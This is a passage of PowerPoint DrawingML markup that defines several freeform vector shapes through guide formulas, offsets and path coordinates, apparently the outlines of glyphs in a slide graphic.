                  <a:gd name="T27" fmla="*/ 871 h 914"/>
                  <a:gd name="T28" fmla="*/ 231 w 857"/>
                  <a:gd name="T29" fmla="*/ 913 h 914"/>
                  <a:gd name="T30" fmla="*/ 0 w 857"/>
                  <a:gd name="T31" fmla="*/ 205 h 914"/>
                  <a:gd name="T32" fmla="*/ 210 w 857"/>
                  <a:gd name="T33" fmla="*/ 136 h 9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57" h="914">
                    <a:moveTo>
                      <a:pt x="210" y="136"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="856" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="136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4" name="Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5986463" y="6086475"/>
                <a:ext cx="203200" cy="222250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 563"/>
                  <a:gd name="T1" fmla="*/ 268 h 616"/>
                  <a:gd name="T2" fmla="*/ 0 w 563"/>
                  <a:gd name="T3" fmla="*/ 184 h 616"/>
                  <a:gd name="T4" fmla="*/ 5 w 563"/>
                  <a:gd name="T5" fmla="*/ 153 h 616"/>
                  <a:gd name="T6" fmla="*/ 16 w 563"/>
                  <a:gd name="T7" fmla="*/ 121 h 616"/>
                  <a:gd name="T8" fmla="*/ 63 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 616"/>
                  <a:gd name="T10" fmla="*/ 95 w 563"/>
                  <a:gd name="T11" fmla="*/ 48 h 616"/>
                  <a:gd name="T12" fmla="*/ 132 w 563"/>
                  <a:gd name="T13" fmla="*/ 32 h 616"/>
                  <a:gd name="T14" fmla="*/ 231 w 563"/>
                  <a:gd name="T15" fmla="*/ 0 h 616"/>
                  <a:gd name="T16" fmla="*/ 268 w 563"/>
                  <a:gd name="T17" fmla="*/ 0 h 616"/>
                  <a:gd name="T18" fmla="*/ 299 w 563"/>
                  <a:gd name="T19" fmla="*/ 11 h 616"/>
                  <a:gd name="T20" fmla="*/ 352 w 563"/>
                  <a:gd name="T21" fmla="*/ 48 h 616"/>
                  <a:gd name="T22" fmla="*/ 368 w 563"/>
                  <a:gd name="T23" fmla="*/ 74 h 616"/>
                  <a:gd name="T24" fmla="*/ 499 w 563"/>
                  <a:gd name="T25" fmla="*/ 378 h 616"/>
                  <a:gd name="T26" fmla="*/ 530 w 563"/>
                  <a:gd name="T27" fmla="*/ 431 h 616"/>
                  <a:gd name="T28" fmla="*/ 562 w 563"/>
                  <a:gd name="T29" fmla="*/ 473 h 616"/>
                  <a:gd name="T30" fmla="*/ 436 w 563"/>
                  <a:gd name="T31" fmla="*/ 525 h 616"/>
                  <a:gd name="T32" fmla="*/ 415 w 563"/>
                  <a:gd name="T33" fmla="*/ 505 h 616"/>
                  <a:gd name="T34" fmla="*/ 394 w 563"/>
                  <a:gd name="T35" fmla="*/ 478 h 616"/>
                  <a:gd name="T36" fmla="*/ 383 w 563"/>
                  <a:gd name="T37" fmla="*/ 520 h 616"/>
                  <a:gd name="T38" fmla="*/ 363 w 563"/>
                  <a:gd name="T39" fmla="*/ 552 h 616"/>
                  <a:gd name="T40" fmla="*/ 331 w 563"/>
                  <a:gd name="T41" fmla="*/ 578 h 616"/>
                  <a:gd name="T42" fmla="*/ 289 w 563"/>
                  <a:gd name="T43" fmla="*/ 599 h 616"/>
                  <a:gd name="T44" fmla="*/ 226 w 563"/>
                  <a:gd name="T45" fmla="*/ 615 h 616"/>
                  <a:gd name="T46" fmla="*/ 199 w 563"/>
                  <a:gd name="T47" fmla="*/ 609 h 616"/>
                  <a:gd name="T48" fmla="*/ 173 w 563"/>
                  <a:gd name="T49" fmla="*/ 594 h 616"/>
                  <a:gd name="T50" fmla="*/ 132 w 563"/>
                  <a:gd name="T51" fmla="*/ 557 h 616"/>
                  <a:gd name="T52" fmla="*/ 116 w 563"/>
                  <a:gd name="T53" fmla="*/ 536 h 616"/>
                  <a:gd name="T54" fmla="*/ 105 w 563"/>
                  <a:gd name="T55" fmla="*/ 510 h 616"/>
                  <a:gd name="T56" fmla="*/ 84 w 563"/>
                  <a:gd name="T57" fmla="*/ 441 h 616"/>
                  <a:gd name="T58" fmla="*/ 84 w 563"/>
                  <a:gd name="T59" fmla="*/ 415 h 616"/>
                  <a:gd name="T60" fmla="*/ 89 w 563"/>
                  <a:gd name="T61" fmla="*/ 389 h 616"/>
                  <a:gd name="T62" fmla="*/ 116 w 563"/>
                  <a:gd name="T63" fmla="*/ 337 h 616"/>
                  <a:gd name="T64" fmla="*/ 137 w 563"/>
                  <a:gd name="T65" fmla="*/ 315 h 616"/>
                  <a:gd name="T66" fmla="*/ 231 w 563"/>
                  <a:gd name="T67" fmla="*/ 242 h 616"/>
                  <a:gd name="T68" fmla="*/ 252 w 563"/>
                  <a:gd name="T69" fmla="*/ 221 h 616"/>
                  <a:gd name="T70" fmla="*/ 263 w 563"/>
                  <a:gd name="T71" fmla="*/ 200 h 616"/>
                  <a:gd name="T72" fmla="*/ 257 w 563"/>
                  <a:gd name="T73" fmla="*/ 158 h 616"/>
                  <a:gd name="T74" fmla="*/ 242 w 563"/>
                  <a:gd name="T75" fmla="*/ 132 h 616"/>
                  <a:gd name="T76" fmla="*/ 221 w 563"/>
                  <a:gd name="T77" fmla="*/ 116 h 616"/>
                  <a:gd name="T78" fmla="*/ 199 w 563"/>
                  <a:gd name="T79" fmla="*/ 111 h 616"/>
                  <a:gd name="T80" fmla="*/ 168 w 563"/>
                  <a:gd name="T81" fmla="*/ 121 h 616"/>
                  <a:gd name="T82" fmla="*/ 137 w 563"/>
                  <a:gd name="T83" fmla="*/ 147 h 616"/>
                  <a:gd name="T84" fmla="*/ 132 w 563"/>
                  <a:gd name="T85" fmla="*/ 158 h 616"/>
                  <a:gd name="T86" fmla="*/ 137 w 563"/>
                  <a:gd name="T87" fmla="*/ 216 h 616"/>
                  <a:gd name="T88" fmla="*/ 26 w 563"/>
                  <a:gd name="T89" fmla="*/ 279 h 616"/>
                  <a:gd name="T90" fmla="*/ 284 w 563"/>
                  <a:gd name="T91" fmla="*/ 305 h 616"/>
                  <a:gd name="T92" fmla="*/ 263 w 563"/>
                  <a:gd name="T93" fmla="*/ 326 h 616"/>
                  <a:gd name="T94" fmla="*/ 231 w 563"/>
                  <a:gd name="T95" fmla="*/ 352 h 616"/>
                  <a:gd name="T96" fmla="*/ 216 w 563"/>
                  <a:gd name="T97" fmla="*/ 378 h 616"/>
                  <a:gd name="T98" fmla="*/ 226 w 563"/>
                  <a:gd name="T99" fmla="*/ 441 h 616"/>
                  <a:gd name="T100" fmla="*/ 236 w 563"/>
                  <a:gd name="T101" fmla="*/ 468 h 616"/>
                  <a:gd name="T102" fmla="*/ 257 w 563"/>
                  <a:gd name="T103" fmla="*/ 484 h 616"/>
                  <a:gd name="T104" fmla="*/ 279 w 563"/>
                  <a:gd name="T105" fmla="*/ 494 h 616"/>
                  <a:gd name="T106" fmla="*/ 305 w 563"/>
                  <a:gd name="T107" fmla="*/ 489 h 616"/>
                  <a:gd name="T108" fmla="*/ 331 w 563"/>
                  <a:gd name="T109" fmla="*/ 473 h 616"/>
                  <a:gd name="T110" fmla="*/ 352 w 563"/>
                  <a:gd name="T111" fmla="*/ 447 h 616"/>
                  <a:gd name="T112" fmla="*/ 357 w 563"/>
                  <a:gd name="T113" fmla="*/ 431 h 616"/>
                  <a:gd name="T114" fmla="*/ 357 w 563"/>
                  <a:gd name="T115" fmla="*/ 415 h 616"/>
                  <a:gd name="T116" fmla="*/ 352 w 563"/>
                  <a:gd name="T117" fmla="*/ 373 h 616"/>
                  <a:gd name="T118" fmla="*/ 310 w 563"/>
                  <a:gd name="T119" fmla="*/ 274 h 6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563" h="616">
                    <a:moveTo>
                      <a:pt x="21" y="268"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="268"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="284" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="284" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="305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5" name="Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6108700" y="5975350"/>
                <a:ext cx="165100" cy="263525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 458"/>
                  <a:gd name="T1" fmla="*/ 0 h 731"/>
                  <a:gd name="T2" fmla="*/ 457 w 458"/>
                  <a:gd name="T3" fmla="*/ 661 h 731"/>
                  <a:gd name="T4" fmla="*/ 331 w 458"/>
                  <a:gd name="T5" fmla="*/ 730 h 731"/>
                  <a:gd name="T6" fmla="*/ 0 w 458"/>
                  <a:gd name="T7" fmla="*/ 62 h 731"/>
                  <a:gd name="T8" fmla="*/ 127 w 458"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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8" h="731">
                    <a:moveTo>
                      <a:pt x="127" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127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6" name="Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6202363" y="5897563"/>
                <a:ext cx="287337" cy="282575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 126 w 799"/>
                  <a:gd name="T1" fmla="*/ 288 h 783"/>
                  <a:gd name="T2" fmla="*/ 383 w 799"/>
                  <a:gd name="T3" fmla="*/ 598 h 783"/>
                  <a:gd name="T4" fmla="*/ 383 w 799"/>
                  <a:gd name="T5" fmla="*/ 598 h 783"/>
                  <a:gd name="T6" fmla="*/ 241 w 799"/>
                  <a:gd name="T7" fmla="*/ 220 h 783"/>
                  <a:gd name="T8" fmla="*/ 378 w 799"/>
                  <a:gd name="T9" fmla="*/ 141 h 783"/>
                  <a:gd name="T10" fmla="*/ 640 w 799"/>
                  <a:gd name="T11" fmla="*/ 446 h 783"/>
                  <a:gd name="T12" fmla="*/ 646 w 799"/>
                  <a:gd name="T13" fmla="*/ 446 h 783"/>
                  <a:gd name="T14" fmla="*/ 504 w 799"/>
                  <a:gd name="T15" fmla="*/ 68 h 783"/>
                  <a:gd name="T16" fmla="*/ 619 w 799"/>
                  <a:gd name="T17" fmla="*/ 0 h 783"/>
                  <a:gd name="T18" fmla="*/ 798 w 799"/>
                  <a:gd name="T19" fmla="*/ 541 h 783"/>
                  <a:gd name="T20" fmla="*/ 656 w 799"/>
                  <a:gd name="T21" fmla="*/ 624 h 783"/>
                  <a:gd name="T22" fmla="*/ 394 w 799"/>
                  <a:gd name="T23" fmla="*/ 320 h 783"/>
                  <a:gd name="T24" fmla="*/ 388 w 799"/>
                  <a:gd name="T25" fmla="*/ 320 h 783"/>
                  <a:gd name="T26" fmla="*/ 530 w 799"/>
                  <a:gd name="T27" fmla="*/ 698 h 783"/>
                  <a:gd name="T28" fmla="*/ 388 w 799"/>
                  <a:gd name="T29" fmla="*/ 782 h 783"/>
                  <a:gd name="T30" fmla="*/ 0 w 799"/>
                  <a:gd name="T31" fmla="*/ 362 h 783"/>
                  <a:gd name="T32" fmla="*/ 126 w 799"/>
                  <a:gd name="T33" fmla="*/ 288 h 7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99" h="783">
                    <a:moveTo>
                      <a:pt x="126" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="288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7" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6457950" y="5819775"/>
                <a:ext cx="219075" cy="220663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 609"/>
                  <a:gd name="T1" fmla="*/ 310 h 611"/>
                  <a:gd name="T2" fmla="*/ 5 w 609"/>
                  <a:gd name="T3" fmla="*/ 236 h 611"/>
                  <a:gd name="T4" fmla="*/ 0 w 609"/>
                  <a:gd name="T5" fmla="*/ 199 h 611"/>
                  <a:gd name="T6" fmla="*/ 10 w 609"/>
                  <a:gd name="T7" fmla="*/ 169 h 611"/>
                  <a:gd name="T8" fmla="*/ 41 w 609"/>
                  <a:gd name="T9" fmla="*/ 110 h 611"/>
                  <a:gd name="T10" fmla="*/ 67 w 609"/>
                  <a:gd name="T11" fmla="*/ 84 h 611"/>
                  <a:gd name="T12" fmla="*/ 99 w 609"/>
                  <a:gd name="T13" fmla="*/ 58 h 611"/>
                  <a:gd name="T14" fmla="*/ 194 w 609"/>
                  <a:gd name="T15" fmla="*/ 5 h 611"/>
                  <a:gd name="T16" fmla="*/ 231 w 609"/>
                  <a:gd name="T17" fmla="*/ 0 h 611"/>
                  <a:gd name="T18" fmla="*/ 262 w 609"/>
                  <a:gd name="T19" fmla="*/ 0 h 611"/>
                  <a:gd name="T20" fmla="*/ 320 w 609"/>
                  <a:gd name="T21" fmla="*/ 26 h 611"/>
                  <a:gd name="T22" fmla="*/ 341 w 609"/>
                  <a:gd name="T23" fmla="*/ 52 h 611"/>
                  <a:gd name="T24" fmla="*/ 535 w 609"/>
                  <a:gd name="T25" fmla="*/ 320 h 611"/>
                  <a:gd name="T26" fmla="*/ 572 w 609"/>
                  <a:gd name="T27" fmla="*/ 368 h 611"/>
                  <a:gd name="T28" fmla="*/ 608 w 609"/>
                  <a:gd name="T29" fmla="*/ 399 h 611"/>
                  <a:gd name="T30" fmla="*/ 498 w 609"/>
                  <a:gd name="T31" fmla="*/ 478 h 611"/>
                  <a:gd name="T32" fmla="*/ 472 w 609"/>
                  <a:gd name="T33" fmla="*/ 463 h 611"/>
                  <a:gd name="T34" fmla="*/ 446 w 609"/>
                  <a:gd name="T35" fmla="*/ 441 h 611"/>
                  <a:gd name="T36" fmla="*/ 446 w 609"/>
                  <a:gd name="T37" fmla="*/ 489 h 611"/>
                  <a:gd name="T38" fmla="*/ 435 w 609"/>
                  <a:gd name="T39" fmla="*/ 520 h 611"/>
                  <a:gd name="T40" fmla="*/ 409 w 609"/>
                  <a:gd name="T41" fmla="*/ 552 h 611"/>
                  <a:gd name="T42" fmla="*/ 372 w 609"/>
                  <a:gd name="T43" fmla="*/ 583 h 611"/>
                  <a:gd name="T44" fmla="*/ 314 w 609"/>
                  <a:gd name="T45" fmla="*/ 610 h 611"/>
                  <a:gd name="T46" fmla="*/ 283 w 609"/>
                  <a:gd name="T47" fmla="*/ 610 h 611"/>
                  <a:gd name="T48" fmla="*/ 257 w 609"/>
                  <a:gd name="T49" fmla="*/ 604 h 611"/>
                  <a:gd name="T50" fmla="*/ 210 w 609"/>
                  <a:gd name="T51" fmla="*/ 573 h 611"/>
                  <a:gd name="T52" fmla="*/ 188 w 609"/>
                  <a:gd name="T53" fmla="*/ 552 h 611"/>
                  <a:gd name="T54" fmla="*/ 173 w 609"/>
                  <a:gd name="T55" fmla="*/ 530 h 611"/>
                  <a:gd name="T56" fmla="*/ 141 w 609"/>
                  <a:gd name="T57" fmla="*/ 473 h 611"/>
                  <a:gd name="T58" fmla="*/ 131 w 609"/>
                  <a:gd name="T59" fmla="*/ 441 h 611"/>
                  <a:gd name="T60" fmla="*/ 131 w 609"/>
                  <a:gd name="T61" fmla="*/ 415 h 611"/>
                  <a:gd name="T62" fmla="*/ 147 w 609"/>
                  <a:gd name="T63" fmla="*/ 363 h 611"/>
                  <a:gd name="T64" fmla="*/ 162 w 609"/>
                  <a:gd name="T65" fmla="*/ 336 h 611"/>
                  <a:gd name="T66" fmla="*/ 241 w 609"/>
                  <a:gd name="T67" fmla="*/ 242 h 611"/>
                  <a:gd name="T68" fmla="*/ 257 w 609"/>
                  <a:gd name="T69" fmla="*/ 216 h 611"/>
                  <a:gd name="T70" fmla="*/ 262 w 609"/>
                  <a:gd name="T71" fmla="*/ 199 h 611"/>
                  <a:gd name="T72" fmla="*/ 246 w 609"/>
                  <a:gd name="T73" fmla="*/ 158 h 611"/>
                  <a:gd name="T74" fmla="*/ 231 w 609"/>
                  <a:gd name="T75" fmla="*/ 132 h 611"/>
                  <a:gd name="T76" fmla="*/ 210 w 609"/>
                  <a:gd name="T77" fmla="*/ 121 h 611"/>
                  <a:gd name="T78" fmla="*/ 184 w 609"/>
                  <a:gd name="T79" fmla="*/ 121 h 611"/>
                  <a:gd name="T80" fmla="*/ 157 w 609"/>
                  <a:gd name="T81" fmla="*/ 137 h 611"/>
                  <a:gd name="T82" fmla="*/ 126 w 609"/>
                  <a:gd name="T83" fmla="*/ 169 h 611"/>
                  <a:gd name="T84" fmla="*/ 126 w 609"/>
                  <a:gd name="T85" fmla="*/ 184 h 611"/>
                  <a:gd name="T86" fmla="*/ 141 w 609"/>
                  <a:gd name="T87" fmla="*/ 236 h 611"/>
                  <a:gd name="T88" fmla="*/ 47 w 609"/>
                  <a:gd name="T89" fmla="*/ 320 h 611"/>
                  <a:gd name="T90" fmla="*/ 309 w 609"/>
                  <a:gd name="T91" fmla="*/ 294 h 611"/>
                  <a:gd name="T92" fmla="*/ 288 w 609"/>
                  <a:gd name="T93" fmla="*/ 320 h 611"/>
                  <a:gd name="T94" fmla="*/ 267 w 609"/>
                  <a:gd name="T95" fmla="*/ 352 h 611"/>
                  <a:gd name="T96" fmla="*/ 257 w 609"/>
                  <a:gd name="T97" fmla="*/ 378 h 611"/>
                  <a:gd name="T98" fmla="*/ 273 w 609"/>
                  <a:gd name="T99" fmla="*/ 441 h 611"/>
